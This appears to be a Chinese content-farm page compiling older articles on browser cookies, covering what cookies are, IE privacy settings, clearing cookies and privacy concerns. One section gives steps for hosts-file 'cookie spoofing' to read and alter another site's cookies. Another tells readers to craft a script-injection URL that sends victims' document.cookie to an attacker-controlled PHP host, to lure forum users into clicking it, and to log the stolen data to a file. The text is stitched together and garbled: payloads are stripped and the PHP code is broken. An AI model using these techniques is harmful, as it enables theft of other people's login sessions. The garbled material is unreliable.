-
當(dāng)前位置:首頁 > 創(chuàng)意學(xué)院 > 營銷推廣 > 專題列表 > 正文
cookie信息被瀏覽器收集(cookie被瀏覽器禁用了怎么辦)
大家好!今天讓創(chuàng)意嶺的小編來大家介紹下關(guān)于cookie信息被瀏覽器收集的問題,以下是小編對此問題的歸納整理,讓我們一起來看看吧。
開始之前先推薦一個非常厲害的Ai人工智能工具,一鍵生成原創(chuàng)文章、方案、文案、工作計劃、工作報告、論文、代碼、作文、做題和對話答疑等等
只需要輸入關(guān)鍵詞,就能返回你想要的內(nèi)容,有小程序、在線網(wǎng)頁版、PC客戶端和批量生成器
問友Ai官網(wǎng):https://ai.de1919.com。
本文目錄:
瀏覽器cookie是什么意思
cookie是一個保存在客戶機中的簡單的文本文件。
Cookie是保存在計算機上的一種文件。在使用計算機瀏覽網(wǎng)頁時,服務(wù)器會生成一個證書并將其返回給我們的計算機。這個證書是cookie。一般來說,cookie是服務(wù)器寫給客戶端的文件,也可以稱為瀏覽器緩存。
簡單來說,它可以讀取并保存你訪問網(wǎng)站時產(chǎn)生的一些行為信息,這些信息通常是加密的,否則會侵犯用戶的隱私。Cookie也可以幫助加快第二次拜訪。通常,在訪問一些網(wǎng)頁時,系統(tǒng)會提示我們是否要保存用戶名和密碼。下次登錄時,就可以自動登錄,無需再次登錄。
Cookie的主要作用
1、可以使用cookie技術(shù)存儲您的賬戶登錄信息,以便下次可以直接登錄。
2、存儲起始頁的首選項。
3、使用緩存技術(shù)可以減少二次訪問網(wǎng)頁的加載時間,直接調(diào)用緩存數(shù)據(jù)實現(xiàn)二次打開。
4、cookie還可以記錄和跟蹤購物車的商品信息(如數(shù)量),記錄用戶的訪問次數(shù)。
cookies是什么意思?
Cookies現(xiàn)在經(jīng)常被大家提到,那么到底什么是Cookies,它有什么作用呢?Cookies是一種能夠讓網(wǎng)站服務(wù)器把少量數(shù)據(jù)儲存到客戶端的硬盤或內(nèi)存,或是從客戶端的硬盤讀取數(shù)據(jù)的一種技術(shù)。Cookies是當(dāng)你瀏覽某網(wǎng)站時,由Web服務(wù)器置于你硬盤上的一個非常小的文本文件,它可以記錄你的用戶ID、密碼、瀏覽過的網(wǎng)頁、停留的時間等信息。當(dāng)你再次來到該網(wǎng)站時,網(wǎng)站通過讀取Cookies,得知你的相關(guān)信息,就可以做出相應(yīng)的動作,如在頁面顯示歡迎你的標(biāo)語,或者讓你不用輸入ID、密碼就直接登錄等等。
從本質(zhì)上講,它可以看作是你的身份證。但Cookies不能作為代碼執(zhí)行,也不會傳送病毒,且為你所專有,并只能由提供它的服務(wù)器來讀取。保存的信息片斷以“名/值”對(name-value pairs)的形式儲存,一個“名/值”對僅僅是一條命名的數(shù)據(jù)。一個網(wǎng)站只能取得它放在你的電腦中的信息,它無法從其它的Cookies文件中取得信息,也無法得到你的電腦上的其它任何東西。
Cookies中的內(nèi)容大多數(shù)經(jīng)過了加密處理,因此一般用戶看來只是一些毫無意義的字母數(shù)字組合,只有服務(wù)器的CGI處理程序才知道它們真正的含義。
由于Cookies是我們?yōu)g覽的網(wǎng)站傳輸?shù)接脩粲嬎銠C硬盤中的文本文件或內(nèi)存中的數(shù)據(jù),因此它在硬盤中存放的位置與使用的操作系統(tǒng)和瀏覽器密切相關(guān)。在Windows 9X系統(tǒng)計算機中,Cookies文件的存放位置為C:WindowsCookies,在Windows NT/2000/XP的計算機中,Cookies文件的存放位置為C:Documents and Settings用戶名Cookies。
硬盤中的Cookies文件可以被Web瀏覽器讀取,它的命令格式為:用戶名@網(wǎng)站地址[數(shù)字].txt。如筆者計算機中的一個Cookies文件名為:ch@163[1].txt。要注意的是:硬盤中的Cookies屬于文本文件,不是程序。
Cookies的設(shè)置
你可以在IE的“工具/Internet選項”的“常規(guī)”選項卡中,選擇“設(shè)置/查看文件”,查看所有保存到你電腦里的Cookies。這些文件通常是以user@domain格式命名的,user是你的本地用戶名,domain是所訪問的網(wǎng)站的域名。如果你使用NetsCape瀏覽器,則存放在“C:PROGRAMFILESNETS- CAPEUSERS”里面,與IE不同的是,NETSCAPE是使用一個Cookie文件記錄所有網(wǎng)站的Cookies。
我們可對Cookie進行適當(dāng)設(shè)置:打開“工具/Internet選項”中的“隱私”選項卡(注意該設(shè)置只在IE6.0中存在,其他版本IE可以單擊“工具/Internet選項”“安全”標(biāo)簽中的“自定義級別”按鈕,進行簡單調(diào)整),調(diào)整Cookie的安全級別。通常情況,可以調(diào)整到“中高”或者“高”的位置。多數(shù)的論壇站點需要使用Cookie信息,如果你從來不去這些地方,可以將安全級調(diào)到“阻止所有Cookies”;如果只是為了禁止個別網(wǎng)站的Cookie,可以單擊“編輯”按鈕,將要屏蔽的網(wǎng)站添加到列表中。在“高級”按鈕選項中,你可以對第一方Cookie和第三方的Cookie進行設(shè)置,第一方Cookie是你正在瀏覽的網(wǎng)站的Cookie,第三方Cookie是非正在瀏覽的網(wǎng)站發(fā)給你的Cookie,通常要對第三方Cookie選擇“拒絕”。你如果需要保存Cookie,可以使用IE的“導(dǎo)入導(dǎo)出”功能,打開“文件/導(dǎo)入導(dǎo)出”,按提示操作即可。
Cookies的寫入與讀取
Cookies集合是附屬于Response對象及Request對象的數(shù)據(jù)集合,使用時需要在前面加上Response或Request。
用于給客戶機發(fā)送Cookies的語法通常為:
當(dāng)給不存在的Cookies集合設(shè)置時,就會在客戶機創(chuàng)建,如果該Cookies己存在,則會被代替。由于Cookies是作為HTTP傳輸?shù)念^信息的一部分發(fā)給客戶機的,所以向客戶機發(fā)送Cookies的代碼一般放在發(fā)送給瀏覽器的HTML文件的標(biāo)記之前。
如果用戶要讀取Cookies,則必須使用Request對象的Cookies集合,其使用方法是:
需要注意的是,只有在服務(wù)器未被下載任何數(shù)據(jù)給瀏覽器前,瀏覽器才能與Server進行Cookies集合的數(shù)據(jù)交換,一旦瀏覽器開始接收Server所下載的數(shù)據(jù),Cookies的數(shù)據(jù)交換則停止,為了避免錯誤,要在程序和前面加上response.Buffer=True。
Cookies的應(yīng)用
幾乎所有的網(wǎng)站設(shè)計者在進行網(wǎng)站設(shè)計時都使用了Cookie,因為他們都想給瀏覽網(wǎng)站的用戶提供一個更友好的、人文化的瀏覽環(huán)境,同時也能更加準(zhǔn)確地收集訪問者的信息。
網(wǎng)站瀏覽人數(shù)管理
由于代理服務(wù)器、緩存等的使用,唯一能幫助網(wǎng)站精確統(tǒng)計來訪人數(shù)的方法就是為每個訪問者建立一個唯一的ID。使用Cookie,網(wǎng)站可以完成以下工作:測定多少人訪問過;測定訪問者中有多少是新用戶(即第一次來訪),多少是老用戶;測定一個用戶多久訪問一次網(wǎng)站。
通常情況下,網(wǎng)站設(shè)計者是借助后臺數(shù)據(jù)庫來實現(xiàn)以上目的的。當(dāng)用戶第一次訪問該網(wǎng)站時,網(wǎng)站在數(shù)據(jù)庫中建立一個新的ID,并把ID通過Cookie傳送給用戶。用戶再次來訪時,網(wǎng)站把該用戶ID對應(yīng)的計數(shù)器加1,得到用戶的來訪次數(shù)或判斷用戶是新用戶還是老用戶。
按照用戶的喜好定制網(wǎng)頁外觀
有的網(wǎng)站設(shè)計者,為用戶提供了改變網(wǎng)頁內(nèi)容、布局和顏色的權(quán)力,允許用戶輸入自己的信息,然后通過這些信息對網(wǎng)站的一些參數(shù)進行修改,以定制網(wǎng)頁的外觀。
在電子商務(wù)站點中實現(xiàn)諸如“購物籃”等功能
可以使用Cookie記錄用戶的ID,這樣當(dāng)你往“購物籃”中放了新東西時,網(wǎng)站就能記錄下來,并在網(wǎng)站的數(shù)據(jù)庫里對應(yīng)著你的ID記錄當(dāng)你“買單”時,網(wǎng)站通過ID檢索數(shù)據(jù)庫中你的所有選擇就能知道你的“購物籃”里有些什么。
在一般的事例中,網(wǎng)站的數(shù)據(jù)庫能夠保存的有你所選擇的內(nèi)容、你瀏覽過的網(wǎng)頁、你在表單里填寫的信息等;而包含有你的唯一ID的Cookie則保存在你的電腦里。
Cookies的缺陷
Cookie雖然被廣泛的應(yīng)用,并能做到一些使用其它技術(shù)不可能實現(xiàn)的功能。但也存在一些不夠完美的方面,給應(yīng)用帶來不便。
多人共用一臺電腦的問題
任何公共場合的電腦或者許多在辦公室或家里使用的電腦,都會同時被兩個以上的人使用。這樣,當(dāng)你用它在網(wǎng)上超市購物時,網(wǎng)上超市或網(wǎng)站會在這臺機器上留下一個Cookie,將來也許就會有某個人試圖使用你的賬戶購物,帶來了不安全的可能。當(dāng)然,在一些使用多用戶操作系統(tǒng)如Windows NT或UNIX的電腦上,這并不會成為一個問題。因為在多用戶操作系統(tǒng)下不同的賬戶的Cookie分別放在不同的地方。
Cookies被刪除時
假如你的瀏覽器不能正常工作,你可能會刪除電腦上所有的臨時Internet文件。然而,一旦這樣操作以后,你就會丟掉所有的Cookies文件。當(dāng)你再次訪問一個網(wǎng)站時,網(wǎng)站會認(rèn)為你是一位新用戶并分配給你一個新的用戶ID以及一個新的Cookie。結(jié)果將會造成網(wǎng)站統(tǒng)計的新老用戶比發(fā)生偏差,而你也難以恢復(fù)過去保存的參數(shù)選擇。
一人使用多臺電腦時
有的人一天之中經(jīng)常使用一臺以上的電腦。例如在辦公室里有一臺電腦、家里有一臺、還有移動辦公用的筆記本電腦。除非網(wǎng)站使用了特別的技術(shù)來解決這一問題,否則,你將會有三個不同的Cookies文件在這三臺機器上,而在三臺機器上訪問過的任何網(wǎng)站都將會把你看成三個不同的用戶。
防范Cookies泄密
想知道你訪問的網(wǎng)站是否在你的硬盤或內(nèi)存中寫入了Cookies信息嗎?只需執(zhí)行下面的操作步驟,就可以了解和控制你正在訪問的網(wǎng)站的Cookies信息。
步驟一 點擊IE窗口中的“工具” “In-ernet選項”,打開“Internet選項”設(shè)置窗口;
步驟二 點擊“Internet選項”設(shè)置窗口中的“安全”標(biāo)簽,然后再點擊“自定義級別”按鈕,進入“安全設(shè)置”窗口;
步驟三 找到“安全設(shè)置”窗口中的“Cookies”設(shè)置項?!癈ookies”設(shè)置項下有兩個分選項,其中“允許使用存儲在您計算機上的Cookies”是針對存儲在用戶計算機硬盤中的Cookies文件;“允許使用每個對話Cookies(未存儲)”是針對存儲在用戶計算機內(nèi)存中的Cookies信息。存儲在硬盤中的Cookies文件是永久存在的,而存儲在內(nèi)存中的Cookies信息是臨時的。要想IE在即將接收來自Web站點的所有Cookies時進行提示,可分別選擇上面兩個分選項中的“提示”項。當(dāng)然,你也可以選擇“啟用”,允許IE接受所有的Cookies信息(這也是IE的默認(rèn)選項);選擇“禁止”,則是不允許Web站點將Cookies存儲到您的計算機上,而且Web站點也不能讀取你計算機中已有的Cookies。
IE6.0提供了更為可靠的個人隱私及安全保護措施,可以讓用戶來控制瀏覽器向外發(fā)送信息的多少。在“Internet 選項”窗口中新增了“隱私”選項卡(圖1),用戶可以在其中直接設(shè)置瀏覽時的隱私級別,按需要控制其他站點對自己電腦所使用的Cookies。如果我們正在瀏覽的站點使用了Cookie,那么在瀏覽器狀態(tài)欄中會有一個黃色驚嘆號的標(biāo)記,雙擊后可打開“隱私報告”對話框,用戶可以在其中查看具體的隱私策略,還可直接點擊“設(shè)置”按鈕后在上述“隱私”選項卡中調(diào)節(jié)安全隱私級別。
在“常規(guī)”選項卡中還增加了“刪除Cookies”按鈕(圖2),方便用戶直接清除本機上的Cookies。另外,在“工具” “選項” “高級”選項卡中也增加了一些進一步提高安全性的選項(如關(guān)閉瀏覽器時清空Internet臨時文件)。其實,如何更好地保護個人隱私和安全是微軟下一代“.NET”戰(zhàn)略軟件中的關(guān)鍵技術(shù),現(xiàn)在IE6.0已經(jīng)嘗試著邁出了第一步。
另外,由于Cookies的信息并不都是以文件形式存放在計算機里,還有部分信息保存在內(nèi)存里。比如你在瀏覽網(wǎng)站的時候,Web服務(wù)器會自動在內(nèi)存中生成Cookie,當(dāng)你關(guān)閉IE瀏覽器的時候又自動把Cookie刪除,那樣上面介紹的兩種方法就起不了作用,我們需要借助注冊表編輯器來修改系統(tǒng)設(shè)置。要注意的是,修改注冊表前請作備份,以便出現(xiàn)問題后能順利恢復(fù)。
運行Regedit,找到如下鍵值:HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionInternet SettingsCacheSpecial PathsCookies,這是Cookies在內(nèi)存中的鍵值,把這個鍵值刪除。至此Cookies無論以什么形式存在,我們都不用再害怕了。
最后有必要說明的一點是:杜絕Cookies雖然可以增強你電腦的信息安全程度,但這樣做同樣會有一些弊端。比如在一些需要Cookies支持的網(wǎng)頁上,會發(fā)生一些莫名其妙的錯誤,典型的例子就是你以后不能使用某些網(wǎng)站的免費信箱了。
Cookies欺騙
通過分析Cookie的格式,我們知道,最后兩項中分別是它的URL路徑和域名,服務(wù)器對Cookie的識別靠的就是這兩個參數(shù)。正常情況下,我們要瀏覽一個網(wǎng)站時輸入的URL便是它的域名,需要經(jīng)過域名管理系統(tǒng)DNS將其轉(zhuǎn)化為IP地址后進行連接。若能在DNS上進行一些設(shè)置,把目標(biāo)域名的IP地址對應(yīng)到其它站點上,我們便可以非法訪問目標(biāo)站點的Cookie了。
要進行Cookies欺騙,其實很簡單。比如在Win9X下的安裝目錄下,有一名為hosts.sam的文件,以文本方式打開后會看到這樣的格式:
127.0.0.1 localhost
經(jīng)過設(shè)置,便可以實現(xiàn)域名解析的本地化,只需將IP和域名依上面的格式添加到文件中并另存為hosts即可。hosts文件實際上可以看成一個本機的DNS系統(tǒng),它可以負(fù)責(zé)把域名解釋成IP地址,它的優(yōu)先權(quán)比DNS服務(wù)器要高,它的具體實現(xiàn)是TCP/IP協(xié)議中的一部分。
比如我們要讀取的目標(biāo)站點 www.abc.com 所生成的Cookies信息,可以借助www.def.com(自己的站點)。在www.def.com 存放用來進行欺騙所需的文件,通過它讀取和修改對方的Cookie。
步驟一 ping出www.def.com 的IP地址:
ping www.def.com
Reply from 192.168.0.1: bytes=32 time=20ms TTL=244
然后修改hosts.sam文件如下:
192.168.0.1 www.abc.com
并保存為hosts文件。
步驟二 讀取Cookies信息:
將用來讀取Cookie的頁面?zhèn)髦羨ww.def.com ,此時連上www.abc.com,由于我們進行本機DNS域名解析的修改,這時網(wǎng)絡(luò)連接的并不是www.abc.com,而是www.def.com 。
這樣www.abc.com設(shè)在本地的Cookie便可被讀出。
步驟三 同樣道理,你可對讀出的數(shù)據(jù)進行修改,并可將修改后的信息寫入Cookie中。修改完畢后,刪掉hosts文件,再重新進入www.abc.com,此時所使用的Cookies數(shù)據(jù)就是你制定的數(shù)據(jù)。
總之,在某種程度上雖然可以實現(xiàn)Cookies的欺騙,給網(wǎng)絡(luò)應(yīng)用帶來不安全的因素,但Cookies文件本身并不會造成用戶隱私的泄露,也不會給黑客提供木馬程序的載體,只要合理使用,它們會給網(wǎng)站管理員進行網(wǎng)站的維護和管理以及廣大用戶的使用都帶來便利。
Cookies集合具有以下幾種屬性
1.Expires屬性:此屬性用來給Cookies設(shè)置一個期限,在期限內(nèi)只要打開網(wǎng)頁就可以調(diào)用被保存的Cookies,如果過了此期限Cookies就自動被刪除。如:
設(shè)定Cookies的有效期到2004年4月1日,到時將自動刪除。如果一個Cookies沒有設(shè)定有效期,則其生命周期從打開瀏覽器開始,到關(guān)閉瀏覽器結(jié)束,每次運行后生命周期將結(jié)束,下次運行將重新開始。
2.Domain屬性:這個屬性定義了Cookies傳送數(shù)據(jù)的唯一性。若只將某Cookies傳送給搜狐主頁時,則可使用如下代碼:
3.Path屬性:定義了Cookies只發(fā)給指定的路徑請求,如果Path屬性沒有被設(shè)置,則使用應(yīng)用軟件的缺省路徑。
4.Srcure屬性:指定Cookies能否被用戶讀取。
5.Haskeys屬性:如果所請求的Cookies是一個具有多個鍵值的Cookies字典,則返回True,它是一個只讀屬性。
參考資料:http://tech.pcicp.com/tools/nettools/browser/2004/12/21/1103612532d8780.html
如何清理qq瀏覽器cookie
方法/步驟為什么要清除瀏覽器的cookie內(nèi)容呢?因為cookie可能記錄了你的隱私,可能是網(wǎng)銀賬號密碼、可能是信用卡相關(guān)信息,一旦這些信息被黑客或者不法分子收集到,那么將對你造成巨大損失。
首先在自己的電腦上安裝瀏覽器,本文以QQ瀏覽器為例
打開瀏覽器,在右上方找到工具圖標(biāo),通過工具圖標(biāo)找到菜單
單擊菜單,找到internet選項,然后單擊該選項
打開設(shè)置internet屬性界面,在界面的選項卡中找到瀏覽歷史記錄--單擊刪除按鈕
在刪除瀏覽的歷史記錄界面--勾選你要刪除的瀏覽器存儲的信息,最重要的是勾選:cookie、表單數(shù)據(jù)、密碼,這幾項是關(guān)乎私人信息的,勾選后單擊刪除按鈕
瀏覽器記錄你賬號密碼的數(shù)據(jù)在清除進行中,清除完畢會返回internet屬性界面。
在internet屬性界面,單擊確定即可清除瀏覽器記錄的你的私人信息
注意:該界面上還有個退出時刪除瀏覽歷史記錄,這一項可用于清除瀏覽器臨時存儲文件,瀏覽器可以反應(yīng)更快。
望采納
Cookie會泄漏個人隱私嗎?
利用Cookie技術(shù)能否如3·15晚會上暗訪廣告銷售人員時他們所吹噓的那樣“可以將全國90%的用戶盡在掌握。他是男是女,年齡、身份,受教育程度,包括您的郵件注冊,包括您參加某個品類抽獎的注冊”“拿到cookie以后什么都可以知道,包括手機電腦多少都可以知道”?理論上講,Cookie里面當(dāng)然可以存儲這些信息,但是,像性別、年齡、QQ號等等這些精確的個人信息,除了你自己提交給網(wǎng)站再由網(wǎng)站記錄在Cookie里之外,是不可能憑空出現(xiàn)在Cookie里的。而正規(guī)設(shè)計的網(wǎng)站,一般不會把這些信息保存在Cookie里(用戶一清空Cookie就沒了),它們最有可能將其保存在自己的數(shù)據(jù)庫中,Cookie里頂多保存一個相關(guān)聯(lián)的身份識別號碼。
當(dāng)然像興趣愛好、年收入情況、上什么網(wǎng)等等信息,倒是有可能通過Cookie獲得,不過獲得的方法也不是直接從Cookie里讀取,而是通過Cookie將客戶端和一系列訪問事件關(guān)聯(lián)起來,用數(shù)據(jù)挖掘的方法獲得。例如,第三方網(wǎng)站通過Cookie發(fā)現(xiàn)我所用的計算機的瀏覽器在某門戶網(wǎng)站里訪問了很多跟天文有關(guān)的頁面,它就可以推斷我喜愛天文。只是這樣所得的結(jié)論是很不精確的,萬一是我的朋友用我的電腦訪問了這些頁面呢?更不要說我們可以通過清除Cookie來干擾它的數(shù)據(jù)挖掘過程和結(jié)論。只不過廣告主對分析結(jié)論的準(zhǔn)確度不太講究,他們只要保證自己的廣告能夠覆蓋特定群體就滿足了,“寧可錯殺千人勿使一人漏網(wǎng)”而已。
談到這里,需要提醒網(wǎng)民的是,雖然保存在自己計算機上的Cookie是安全的,但Cookie一旦被流氓軟件截獲和上傳,其后果將是災(zāi)難性的。
長期以來,我國個人隱私保護方面存在嚴(yán)重不足,相當(dāng)一部分網(wǎng)民對此毫不在意,認(rèn)為只有名人、大人物才需要保護個人隱私,這種錯誤觀念使得自家電腦門戶洞開、流氓軟件大行其道,同時大批網(wǎng)民的個人資料被釣魚網(wǎng)站利用、被中小網(wǎng)站收集販賣。真誠希望廣大網(wǎng)民能夠從此重視這個問題,保護好自己的個人隱私不被非法侵害。
參考資料:百度知道日報,《酸奶里的益生菌值得買嗎?》 http://zhidao.baidu.com/daily/view?id=2061
瀏覽器中的cookie是什么東東?
cookie 歷來指就著牛奶一起吃的點心。然而,在因特網(wǎng)內(nèi),“cookie”這個字有了完全不同的意思。那么“cookie”到底是什么呢?“Cookie”是小量信息,由網(wǎng)絡(luò)服務(wù)器發(fā)送出來以存儲在網(wǎng)絡(luò)瀏覽器上,從而下次這位獨一無二的訪客又回到該網(wǎng)絡(luò)服務(wù)器時,可從該瀏覽器讀回此信息。這是很有用的,讓瀏覽器記住這位訪客的特定信息,如上次訪問的位置、花費的時間或用戶首選項(如樣式表)。Cookie 是個存儲在瀏覽器目錄的文本文件,當(dāng)瀏覽器運行時,存儲在 RAM 中。一旦閣下從該網(wǎng)站或網(wǎng)絡(luò)服務(wù)器退出,Cookie 也可存儲在計算機的硬驅(qū)上。I3I.net的打算是,當(dāng)訪客結(jié)束其瀏覽器對話時,即終止I3I.net的所有 cookie。Cookie 有哪些用途?
Cookie 的用途之一是存儲用戶在特定網(wǎng)站上的密碼和 ID。另外,也用于存儲起始頁的首選項。在提供個人化查看的網(wǎng)站上,將要求閣下的網(wǎng)絡(luò)瀏覽器利用閣下計算機硬驅(qū)上的少量空間來儲存這些首選項。這樣,每次閣下登錄該網(wǎng)站時,閣下的瀏覽器將檢查閣下是否就該唯一的服務(wù)器有任何預(yù)先定義的首選項(cookie)。如果有的話,瀏覽器將此 cookie 隨閣下對網(wǎng)頁的請求一起發(fā)送給服務(wù)器。Microsoft 和 Netscape 使用 cookie 在其網(wǎng)站上創(chuàng)建個人起始頁。各家公司利用 cookie 的一般用途包括:在線定貨系統(tǒng)、網(wǎng)站個人化和網(wǎng)站跟蹤。
網(wǎng)站個人化是 cookie 最有益的用途之一。例如,當(dāng)誰來到 CNN 網(wǎng)站,但并不想查看任何商務(wù)新聞。網(wǎng)站允許他將該項選為選項。從那時起(或者直到 cookie 逾期),他在訪問 CNN 網(wǎng)頁時將不會讀到商務(wù)新聞。
這些 Cookie 是如何起作用的?
文檔的 HTML 代碼中的命令行告訴瀏覽器設(shè)置某一名稱或數(shù)值的 cookie。以下是用來設(shè)置 cookie 腳本的一個普通實例。
Set-Cookie: name = VALUE;
expires = DATE;
path = PATH;
domain = DOMAIN_NAME;
那么安全性如何?HTTP Cookie 不能用來從閣下的硬驅(qū)上檢索個人數(shù)據(jù)、放置病毒、得到閣下的電子郵件地址或偷竊有關(guān)閣下身份的敏感信息;然而,HTTP Cookie 可用來跟蹤閣下在特定網(wǎng)站上的所到之處。不使用 cookie 就很難進行網(wǎng)站跟蹤。
至于其他一切與因特網(wǎng)有關(guān)的事,如同閣下所希望的那樣是匿名的。沒有網(wǎng)站知道閣下是誰,除非閣下自己透露給網(wǎng)站。同時,cookie 只是為了更好地了解使用模式并改進網(wǎng)站訪客的效率而采用的一個網(wǎng)站跟蹤統(tǒng)計手段而已。
如果網(wǎng)站設(shè)計師旨在使網(wǎng)頁能與訪客更具互動作用,或者若設(shè)計師計劃讓訪客自定義網(wǎng)站的外觀,則就需要使用 cookie。而且,如果閣下想要網(wǎng)站在某些情況下改變其外觀,cookie 則提供了一條快速、容易的途徑,讓閣下的 HTML 頁面按需要而改變。最新型的服務(wù)器使用 cookie 有助于數(shù)據(jù)庫的互動性,進而改進網(wǎng)站的整體互動性。
Cookie在英文中是小甜品的意思,而這個詞我們總能在瀏覽器中看到,食品怎么會跟瀏覽器扯上關(guān)系呢?在你瀏覽以前登陸過的網(wǎng)站時可能會在網(wǎng)頁中出現(xiàn):你好XX,感覺很親切,就好像是吃了一個小甜品一樣。這其實是通過訪問你主機里邊的一個文件來實現(xiàn)的,因此這個文件也就被稱為了Cookie。想全面了解Cookie嗎?看看下文吧!
一.了解Cookie 適用對象:初級讀者
Cookie是當(dāng)你瀏覽某網(wǎng)站時,網(wǎng)站存儲在你機器上的一個小文本文件,它記錄了你的用戶ID,密碼、瀏覽過的網(wǎng)頁、停留的時間等信息,當(dāng)你再次來到該網(wǎng)站時,網(wǎng)站通過讀取Cookie,得知你的相關(guān)信息,就可以做出相應(yīng)的動作,如在頁面顯示歡迎你的標(biāo)語,或者讓你不用輸入ID、密碼就直接登錄等等。你可以在IE的“工具/Internet選項”的“常規(guī)”選項卡中,選擇“設(shè)置/查看文件”,查看所有保存到你電腦里的Cookie。這些文件通常是以user@domain格式命名的,user是你的本地用戶名,domain是所訪問的網(wǎng)站的域名。如果你使用NetsCape瀏覽器,則存放在“C:\PROGRAMFILES\NETSCAPE\USERS\”里面,與IE不同的是,NETSCAPE是使用一個Cookie 文件記錄所有網(wǎng)站的Cookies。
為了保證上網(wǎng)安全我們需要對Cookie進行適當(dāng)設(shè)置。打開“工具/Internet選項”中的“隱私”選項卡(注意該設(shè)置只在IE6.0中存在,其他版本IE可以在“工具/Internet選項”的“安全”標(biāo)簽中單擊“自定義級別”按鈕,進行簡單調(diào)整),調(diào)整Cookie的安全級別。通常情況,可以將滑塊調(diào)整到“中高”或者“高”的位置。多數(shù)的論壇站點需要使用Cookie信息,如果你從來不去這些地方,可以將安全級調(diào)到“阻止所有Cookies”。如果只是為了禁止個別網(wǎng)站的Cookie,可以單擊“編輯”按鈕,將要屏蔽的網(wǎng)站添加到列表中。在“高級”按鈕選項中,你可以對第一方Cookie和第三方的Cookie進行設(shè)置,第一方Cookie是你正在瀏覽的網(wǎng)站的Cookie,第三方Cookie非正在瀏覽的網(wǎng)站發(fā)給你的Cookie,通常要對第三方Cookie選擇“拒絕”,如圖1。你如果需要保存Cookie,可以使用IE的“導(dǎo)入導(dǎo)出”功能,打開“文件/導(dǎo)入導(dǎo)出”,按提示操作即可。
Cookie中的內(nèi)容大多數(shù)經(jīng)過了加密處理,因此在我們看來只是一些毫無意義的字母數(shù)字組合,只有服務(wù)器的CGI處理程序才知道它們真正的含義。通過一些軟件我們可以查看到更多的內(nèi)容,使用Cookie Pal軟件查看到的Cookie信息,如圖2所示。它為我們提供了Server、Expires、Name、value等選項的內(nèi)容。其中,Server是存儲Cookie的網(wǎng)站,Expires記錄了Cookie的時間和生命期,Name和value字段則是具體的數(shù)據(jù)
二、Cookie的傳遞流程 適用對象:中級讀者
當(dāng)在瀏覽器地址欄中鍵入了一個Web站點的URL,瀏覽器會向該Web站點發(fā)送一個讀取網(wǎng)頁的請求,并將結(jié)果在顯示器上顯示。這時該網(wǎng)頁在你的電腦上尋找Amazon網(wǎng)站設(shè)置的Cookie文件,如果找到,瀏覽器會把Cookie文件中的數(shù)據(jù)連同前面輸入的URL一同發(fā)送到Amazon服務(wù)器。服務(wù)器收到Cookie數(shù)據(jù),就會在他的數(shù)據(jù)庫中檢索你的ID,你的購物記錄、個人喜好等信息,并記錄下新的內(nèi)容,增加到數(shù)據(jù)庫和Cookie文件中去。如果沒有檢測到Cookie或者你的Cookie信息與數(shù)據(jù)庫中的信息不符合,則說明你是第一次瀏覽該網(wǎng)站,服務(wù)器的CGI程序?qū)槟銊?chuàng)建新的ID信息,并保存到數(shù)據(jù)庫中。
Cookie是利用了網(wǎng)頁代碼中的HTTP頭信息進行傳遞的,瀏覽器的每一次網(wǎng)頁請求,都可以伴隨Cookie傳遞,例如,瀏覽器的打開或刷新網(wǎng)頁操作。服務(wù)器將Cookie添加到網(wǎng)頁的HTTP頭信息中,伴隨網(wǎng)頁數(shù)據(jù)傳回到你的瀏覽器,瀏覽器會根據(jù)你電腦中的Cookie設(shè)置選擇是否保存這些數(shù)據(jù)。如果瀏覽器不允許Cookie保存,則關(guān)掉瀏覽器后,這些數(shù)據(jù)就消失。Cookie在電腦上保存的時間是不一樣的,這些都是由服務(wù)器的設(shè)置不同決定得。Cookie有一個Expires(有效期)屬性,這個屬性決定了Cookie的保存時間,服務(wù)器可以通過設(shè)定Expires字段的數(shù)值,來改變Cookie的保存時間。如果不設(shè)置該屬性,那么Cookie只在瀏覽網(wǎng)頁期間有效,關(guān)閉瀏覽器,這些Cookie自動消失,絕大多數(shù)網(wǎng)站屬于這種情況。通常情況下,Cookie包含Server、Expires、Name、value這幾個字段,其中對服務(wù)器有用的只是Name和value字段,Expires等字段的內(nèi)容僅僅是為了告訴瀏覽器如何處理這些Cookies。
三、Cookie的編程實現(xiàn) 適用對象:高級讀者
多數(shù)網(wǎng)頁編程語言都提供了對Cookie的支持。如javascript、VBScript、Delphi、ASP、SQL、PHP、C#等。在這些面向?qū)ο蟮木幊陶Z言中,對Cookie的編程利用基本上是相似的,大體過程為:先創(chuàng)建一個Cookie對象(Object),然后利用控制函數(shù)對Cookie進行賦值、讀取、寫入等操作。那么如何通過代碼來獲取其他用戶Cookie中的敏感信息?下面進行簡單的介紹。
該方法主要有兩步,首先要定位你需要收集Cookie的網(wǎng)站,并對其進行分析,并構(gòu)造URL;然后編制收集Cookie的PHP代碼,并將其放到你可以控制的網(wǎng)站上,當(dāng)不知情者單擊了你構(gòu)造的URL后可以執(zhí)行該PHP代碼。下面我們看具體的實現(xiàn)過程。
1.分析并構(gòu)造URL
首先打開我們要收集Cookie的網(wǎng)站,這里假設(shè)是http://www.XXX.net,登陸網(wǎng)站輸入用戶名“”(不含引號),對數(shù)據(jù)進行分析抓包,得到形如“http://www.XXX.net/txl/login/login....x=28&;ok.y=6”的代碼,將“”更換為“”再試;如果執(zhí)行成功,就開始構(gòu)造URL:“http://www.cbifamily.org/cbi.php?\"%2Bdocuments.cookie)&passwd=&ok.x=28&ok.y=6" target="_blank">http://www.XXX.net/txl/login/log;... swd=&ok.x=28&ok.y=6”。其中http:///www.cbifamily.org/cbi.php就是你能夠控制的某臺主機上的一個腳本。需要注意的是“%2B”為符號“+”的URL編碼,因為“+”將被作為空格處理。該URL就可以在論壇中發(fā)布,誘使別人點擊了。
2.編制PHP腳本
該腳本的作用就是收集Cookie文件,具體內(nèi)容如下:
$info = getenv("QUERY_STRING";
if ($info) {
$fp = fopen("info.txt","a";
fwrite($fp,$info."\n";
fclose($fp);
}
header("Location: http://www.XXX.net\";
?>
四、Cookie的安全問題 適用對象:所有希望上網(wǎng)安全的讀者
1.Cookie欺騙
